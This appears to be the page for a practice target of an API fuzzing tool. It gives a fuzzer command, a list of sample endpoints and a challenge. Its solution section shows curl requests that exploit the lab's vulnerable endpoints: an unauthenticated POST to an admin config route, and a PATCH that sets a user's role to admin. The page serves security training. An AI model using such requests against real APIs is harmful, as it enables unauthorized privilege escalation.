API Griffer sample target

A small sample site with fuzzable API endpoints.

Use this target at https://api-fuzz.labs.nsouthern.com, then point API Griffer at it to confirm route discovery, method handling, and clear responses.

View the GitHub repo

python3 api_fuzzer.py -u https://api-fuzz.labs.nsouthern.com/api -b wordlists/endpoints.txt -a wordlists/actions.txt --depth 1 -X GET -o findings.jsonl

Sample endpoints

These paths are intentionally aligned with the bundled endpoint and action wordlists.

/api/health
/api/status
/api/version
/api/auth/login
/api/auth/logout
/api/auth/token
/api/auth/refresh-token
/api/users
/api/users/invite
/api/users/list
/api/users/profile
/api/users/reset
/api/files/upload
/api/files/import
/api/files/download
/api/render/status
/api/render/preview
/api/admin/config
/api/reports/export
/api/webhooks/test
/api/search/query
/api/projects/list
/api/tokens/refresh

Challenge

There are two vulnerable endpoints: one uses a POST request and one uses a PATCH request. Find them and exploit them.

Show solution curl commands

curl -X POST https://api-fuzz.labs.nsouthern.com/api/admin/config -H "Content-Type: application/json" -d '{"adminEmail":"admin@example.com"}'

curl -X PATCH https://api-fuzz.labs.nsouthern.com/api/users/profile -H "Content-Type: application/json" -d '{"displayName":"Nico","role":"admin"}'